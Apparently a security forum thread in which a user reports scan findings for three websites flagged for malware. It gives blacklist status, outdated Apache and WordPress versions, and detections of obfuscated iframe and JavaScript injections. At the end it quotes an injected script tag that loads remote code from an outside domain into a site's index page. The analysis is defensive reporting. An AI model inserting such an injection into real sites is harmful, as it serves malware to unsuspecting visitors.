See: MX VW: Up(nil): RIPE ES felix at satec dot es 213.134.43.110 to 213.134.43.110 medicosdomundo dot org htxp://medicosdomundo.org/
Flagged by BitDefender: https://www.virustotal.com/nl/url/cc042ab41cd0086f9a260a3e6f524ead853fedf62f2491c42ebfde1c0557bbd0/analysis/1406469472/
Nothing here: http://killmalware.com/medicosdomundo.org/
nor here: http://zulu.zscaler.com/submission/show/93fbb716db934bc826820d02d88e8f62-1406469813
Site is vulnerable because of Outdated Web Server Apache Found Vulnerabilities on Apache 2.2 Apache/2.2.22
Server redirect: Code: 302, htxp://www.medicosdelmundo.org/ Redirect to external server!
Javascript check: Suspicious
web/pwc/js/jquery.bgiframe.js" type=“text/javascript”><script src="/modulos/global/publico/interfaces/web/pwc/js/jquery.dimensions.
Google browser diff: Not identical
Google: 43681 bytes Firefox: 43560 bytes
Diff: 121 bytes
First difference:
f=“htxp://saludparatodos.medicosdelmundo.org/” title=“enlace al blog de la campaã±a salud para tod@s de mã©dicos del mundo comunidad de madrid.”><img width=“161” height=“110” …
pol
IP seems blacklisted 213.134.43.110. We thank Pondus for checking.
pol
Only blacklisted by Yandex or for a reason:
See bad web rep: https://www.mywot.com/en/scorecard/lwhospitalityadvisors.com?utm_source=addon&utm_content=popup
Infested with HTML/Rce.Gen3:
ISSUE DETECTED DEFINITION INFECTED URL
Website Malware MW:IFRAME:HD28 htxp://lwhospitalityadvisors.com
Website Malware php-error-headers-already-sent htxp://lwhospitalityadvisors.com/404testpage4525d2fdc
Website Malware php-error-headers-already-sent htxp://lwhospitalityadvisors.com/404javascript.js
Website Malware MW:IFRAME:HD28 htxp://www.lwhospitalityadvisors.com/
Website Malware MW:IFRAME:HD28 htxp://www.lwhospitalityadvisors.com/who-we-are/mission
Website Malware MW:IFRAME:HD28 htxp://www.lwhospitalityadvisors.com/team
Known javascript malware. Details: http://sucuri.net/malware/entry/MW:IFRAME:HD28
20 potentially suspciious files: http://quttera.com/detailed_report/lwhospitalityadvisors.com
Suspicious JavaScript code injection.
Details: Procedure [unescape] has been called with a hidden string ‘document.write(i910ac57(’’ containing execution of potentially suspicious code. See attached
CMS Web application version:
WordPress version: WordPress
Wordpress version from source: 3.9.1
Wordpress Version 3.9.x based on: htxp://lwhospitalityadvisors.com/wp-admin/js/common.js
WordPress theme: htxp://www.lwhospitalityadvisors.com/wp-content/themes/LWHA/
Wordpress internal path: /home/content/l/w/h/lwhadvisors/html/wp-content/themes/LWHA/index.php
(-s critical information vulnerability?)
polonus
Another one flagged by Yandex. http://sitecheck.sucuri.net/results/justinkobza.de/
ISSUE DETECTED DEFINITION INFECTED URL
Website Malware mwjs-iframe-injected691?v24 htxp://justinkobza.de/
Website Malware mwjs-iframe-injected691?v24 htxp://justinkobza.de/404javascript.js
Known javascript malware. Details: http://labs.sucuri.net/db/malware/mwjs-iframe-injected691?v24
See: https://www.virustotal.com/nl/url/d77d3903a115a9c018a1caf16c41ea16016ff9ff7dbc7a52e5b47742d4d357eb/analysis/1406474013/
external link scan:
https://www.virustotal.com/nl/url/47a596977188e0c702066f02446e1aacbf222574c68674fb81d33385a9d657ac/analysis/
File name: /index.html
[[<!--0d38e4--><scripttype="text/javascript"src="htxp://synfachem.de/jw8x9dXv.php?id=12659977"></script><!--/0d38e4-->]]
code broken
pol